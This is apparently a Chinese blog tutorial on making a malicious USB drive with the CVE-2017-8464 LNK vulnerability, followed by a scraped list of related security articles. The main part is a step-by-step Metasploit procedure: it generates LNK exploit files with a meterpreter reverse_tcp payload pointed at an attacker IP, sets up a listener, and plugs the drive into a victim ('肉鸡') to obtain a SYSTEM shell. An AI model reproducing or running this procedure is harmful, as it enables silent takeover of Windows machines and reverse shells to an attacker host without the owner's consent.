利用CVE-2017-8464漏洞制作病毒U盘攻击
利用CVE-2017-8464漏洞制作病毒U盘
漏洞简介
在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。
病毒U盘制作
使用kali中msfconsole攻击模块生成病毒U盘文件。
1、启动msfconsole
2、搜索漏洞攻击模块
search CVE-2017-8464
3、使用LNK漏洞攻击模块(复制编号0的攻击模块)
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
show options
4、设置payload
set payload windows/meterpreter/reverse_tcp
5、设置LHOST(攻击机IP地址)
set lhost 192.168.1.213 (改为自己攻击机器IP)
6、运行攻击模块
exploit
7、在/root/.msf4/local/目录下生成了对应的病毒文件
8、将上一步生成的所有文件复制到U盘中,如上图所示文件
9、在kali中开启监听
use exploit/multi/handler
10、设置payload
set payload windows/meterpreter/reverse_tcp
11、配置lhost
set lhost 192.168.1.213 (改为自己攻击机的IP)
12、启动监听模块
exploit
13、将U盘插入肉鸡中,kali成功创建了session
14、成功拿到system权限shell
漏洞说明:
利用kali生成的病毒文件会直接反弹一个shell,我们也可以自己编写cpl恶意代码文件来实现攻击效果,具体实现看上一篇文章
CVE-2017-8464漏洞原理分析
LNK文件生成器:Github
利用CVE-2017-8464漏洞制作病毒U盘攻击相关推荐
- 经典利用永恒之蓝漏洞对Windows操作系统进行攻击
利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...
- 利用手动Ghost工具手动安装系统(U盘)
一键u盘启动快捷键:http://www.uqidong.net/ 利用手动Ghost工具手动安装Ghost XP系统详细图文教程:http://www.uqidong.com/xgj ...
- Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...
- 【每日新闻】2017年漏洞披露数量创纪录达20,832个 | 朱啸虎评ICO:考验人性的模式从来就没有成功过
每一个企业级的人 都置顶了 中国软件网 中国软件网 为你带来最新鲜的行业干货 小编点评 每一个持续进行的模式 都有各自的道理 包括风险投资 趋势洞察 朱啸虎评ICO:考验人性的模式从来就没有成功过 ...
- 苹果2017年漏洞学习总结
苹果2017年漏洞学习总结 一. 漏洞资料列举: 1. Yalu102 漏洞编号:CVE-2017-2370 作者:kpwn https://github.com/kpwn/yalu ...
- 使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502) 警告 请勿将本文提到的任何技术用于非法用途 ...
- 黑客利用Apache Struts 2漏洞在服务器上传递Cerberus勒索软件
前一阵,我们对Apache Strust 2的CVE-2017-5638漏洞进行了预警,最近F5实验室的研究人员发现Apache Struts 2 漏洞被网络罪犯用于传递Cerber勒索软件. 实际上 ...
- 利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...
- 破解索尼PS4系列:利用网页漏洞实现相关的ROP攻击(一)
本文讲的是破解索尼PS4系列:利用网页漏洞实现相关的ROP攻击(一), 目前关于PS4的黑客攻击还非常的少,但这并不能说明PS4 系统非常安全,黑客不会对其发动攻击.本文的目的就是找出PS4的一系列漏 ...
- 利用“域名后缀”的漏洞劫持国家顶级域名(一)
本文讲的是 利用"域名后缀"的漏洞劫持国家顶级域名(一), 域名是互联网基础的一部分,我们时刻都在使用它.然而,大多数使用域名的人却很少了解域名是如何工作的.由于涉及到许多抽象层的 ...
最新文章
- 从零开始入门 K8s| 阿里技术专家详解 K8s 核心概念
- GIS基础软件及操作(十)
- 顶峰Android手机视频转换器,顶峰3GP手机视频转换器
- Linux登录界面消失解决办法
- 视觉SLAM十四讲学习笔记-第四讲-Sophus实践、相似变换群与李代数
- 常见的大数据安全5个问题和解决策略
- 191029_中国地震局爬取
- python控制电脑音量,声音之控制音量,,
- 定时器 + websocket
- LabVIEW编程LabVIEW控制研华PCI-1739U例程与相关资料
- [Linux] 使用 Wine
- 全景图拍摄设备有哪些?全景图拍摄方法
- JAVA经典兔子问题
- tp3.2打印mysql查询语句_[tp3.2.1]sql查询语句(一)
- 11、深圳经济特区数据条例
- 唯品会技术架构一览表
- SQL注入原理-时间盲注
- 比特大陆IPO之旅即将终结
- 淘宝手机端详情页的设置
- 用JavaScript获取一年的天数
热门文章
- WBS:工作分解结构(Work Breakdown Structure)
- Prometheus 实战于源码分析之webHandler
- NLP - sentencepiece
- 计算机专业硬件面试题目,硬件工程师面试试题
- 无人机DLG生产作业流程
- oracle单表空间预估,使用ARIMA和腾讯的Metis时序数据异常检测来预测系统空间容量变化趋势...
- 支付宝支付接口客户端调试工具使用教程
- 教师计算机考核有啥用,教师计算机使用管理制度和考核方案
- 输电线缺陷检测 计算机工程与设计,小波去噪和混沌理论应用于输电线缺陷检测-计算机工程与应用.pdf...
- 特殊符号大全复制_王者荣耀名字特殊符号2019 稀有漂亮最新热门符号大全